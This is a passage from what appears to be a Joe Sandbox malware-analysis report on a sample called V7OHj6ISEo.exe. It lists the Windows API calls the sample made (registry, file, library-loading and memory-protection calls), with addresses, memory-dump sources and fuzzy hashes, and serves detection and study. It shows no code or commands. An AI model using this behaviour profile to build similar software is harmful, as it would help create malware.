                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                            • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNELBASE(00000000), ref: 75562B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 04e85c64b7d1f7b6af6b108cddf2f2f73468be87baebc2e028c264306510c476
                                                                                                            • Instruction ID: 3079468f9fbab46b6c1913aba522517f48173cff616b21143563c7258dae480b
                                                                                                            • Opcode Fuzzy Hash: 04e85c64b7d1f7b6af6b108cddf2f2f73468be87baebc2e028c264306510c476
                                                                                                            • Instruction Fuzzy Hash: A041BF769102C4EFDB21DF6ADA41B493765FB84B64FB04827F801CA600CBB6E484CB92
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                            • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F933,0040CED0,004033DE,0040CED0,0040F933,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(7556505C,00000004,00000040,7556504C), ref: 755629B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 42b003e987185a8c5626b01f5443a20f1f4e53a80a3fbb4e0fd473b4f07b4f82
                                                                                                            • Instruction ID: 938c50494312421dec0a91256291f3104595f585e1a38ba02ba7210e9f0cc35b
                                                                                                            • Opcode Fuzzy Hash: 42b003e987185a8c5626b01f5443a20f1f4e53a80a3fbb4e0fd473b4f07b4f82
                                                                                                            • Instruction Fuzzy Hash: FCF092B29A42C1DEC351CF2EC5447093BE0FB09B24BA0462BF188DE240EB34E088CB91
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
